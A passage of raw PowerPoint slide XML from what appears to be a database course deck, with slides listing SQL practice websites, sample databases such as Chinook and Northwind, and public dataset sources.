          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1363625"/>
            <a:ext cx="8520600" cy="213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000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>We have to create SSH Key Pair o</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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4" name="Shape 3494"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3495" name="Google Shape;3495;p56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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>More SQL Practice</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3496" name="Google Shape;3496;p564"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1224975" y="1069750"/>
            <a:ext cx="7308300" cy="3546600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0097A7"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.w3resource.com/sql-exercises/</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="0097A7"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0097A7"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://sqlzoo.net/</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="0097A7"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0097A7"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://exercism.org/tracks/plsql/exercises</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="0097A7"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0097A7"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.codecademy.com/learn/learn-sql</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="0097A7"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0097A7"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://leetcode.com/studyplan/top-sql-50/</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="0097A7"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0097A7"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://sqlfiddle.com/</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="0097A7"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0097A7"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://pgexercises.com</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="0097A7"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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0" name="Shape 3500"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3501" name="Google Shape;3501;p565"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228125" y="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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sample Databases</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3020">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3502" name="Google Shape;3502;p565"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228125" y="377850"/>
            <a:ext cx="8916000" cy="4765800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1150"/>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>MySQL Sample Databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>How to setup</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1150"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>MySQL official documentation provides sample databases that you can download and use for practice. Examples include the classic "employees" database and the "world" database.</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>SQLite Sample Database ChinookDatabase</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1150"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>SQLite's official website provides a sample database called "Chinook," which represents a music collection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>. You can download it for practicing SQL queries.</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Northwind and Pubs Sample Databases MySQL</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://github.com/harryho/db-samples</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1150"/>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>PostgreSQL Sample Databases (pgexercises.com):</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1150"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>PGExercises is a website that provides interactive exercises for learning and practicing PostgreSQL. While not a direct download, it allows you to practice SQL in an interactive environment with realistic datasets.</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1150"/>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Sample Databases on GitHub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1150"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>GitHub has a datasets section where you can find various databases in different formats. You can search for databases in SQL format and download them for practice.</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:srgbClr val="0097A7"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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6" name="Shape 3506"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3507" name="Google Shape;3507;p566"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228125" y="7620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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>More Datasets</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3020">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3508" name="Google Shape;3508;p566"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333650" y="1380500"/>
            <a:ext cx="8571000" cy="4387800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-352425" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0097A7"/>
              </a:buClr>
              <a:buSzPts val="1950"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1950" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://data.gov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1950" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-352425" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0097A7"/>
              </a:buClr>
              <a:buSzPts val="1950"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>kaggle.com/datasets</a:t>
            </a:r>
            <a:endParaRPr sz="1950">
              <a:solidFill>
                <a:srgbClr val="0097A7"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-352425" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0097A7"/>
              </a:buClr>
              <a:buSzPts val="1950"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1950" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://www.rebasedata.com/convert-bak-to-mysql-online</a:t>
            </a:r>
            <a:endParaRPr sz="1950">
              <a:solidFill>
                <a:srgbClr val="0097A7"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-352425" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0097A7"/>
              </a:buClr>
              <a:buSzPts val="1950"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1950" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://dataedo.com/samples/</a:t>
            </a:r>
            <a:endParaRPr sz="1950">
              <a:solidFill>
                <a:srgbClr val="0097A7"/>
              </a:solidFill>
            </a:endParaRPr>
